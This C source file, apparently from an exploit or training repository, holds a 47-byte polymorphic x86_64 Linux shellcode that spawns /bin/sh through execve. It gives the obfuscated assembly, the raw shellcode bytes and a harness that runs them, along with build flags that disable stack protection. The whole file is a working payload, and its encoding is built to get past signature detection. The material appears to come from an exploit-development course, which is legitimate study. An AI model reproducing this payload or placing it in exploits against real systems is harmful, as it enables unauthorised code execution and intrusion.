50 lines
No EOL
1.2 KiB
C
50 lines
No EOL
1.2 KiB
C
/*---------------------------------------------------------------------------------------------------------------------
|
|
/*
|
|
*Title: x86_64 linux Polymorphic execve-stack 47 bytes
|
|
*Author: Sathish kumar
|
|
*Contact: https://www.linkedin.com/in/sathish94
|
|
* Copyright: (c) 2016 iQube. (http://iQube.io)
|
|
* Release Date: January 6, 2016
|
|
*Description: X86_64 linux Polymorphic execve-stack 47 bytes
|
|
*Tested On: Ubuntu 14.04 LTS
|
|
*SLAE64-1408
|
|
*Build/Run: gcc -fno-stack-protector -z execstack sellcode.c -o shellcode
|
|
* ./shellcode
|
|
*
|
|
global _start
|
|
|
|
_start:
|
|
|
|
xor esi, esi
|
|
xor r15, r15
|
|
mov r15w, 0x161f
|
|
sub r15w, 0x1110
|
|
push r15
|
|
mov r15, rsp
|
|
mov rdi, 0xff978cd091969dd0
|
|
inc rdi
|
|
neg rdi
|
|
mul esi
|
|
add al, 0x3b
|
|
push rdi
|
|
push rsp
|
|
pop rdi
|
|
call r15
|
|
*/
|
|
|
|
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
|
|
unsigned char code[] = \
|
|
"\x31\xf6\x4d\x31\xff\x66\x41\xbf\x1f\x16\x66\x41\x81\xef\x10\x11\x41\x57\x49\x89\xe7\x48\xbf\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xff\xc7\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x41\xff\xd7";
|
|
main()
|
|
{
|
|
|
|
printf("Shellcode Length: %d\n", (int)strlen(code));
|
|
|
|
int (*ret)() = (int(*)())code;
|
|
|
|
ret();
|
|
|
|
} |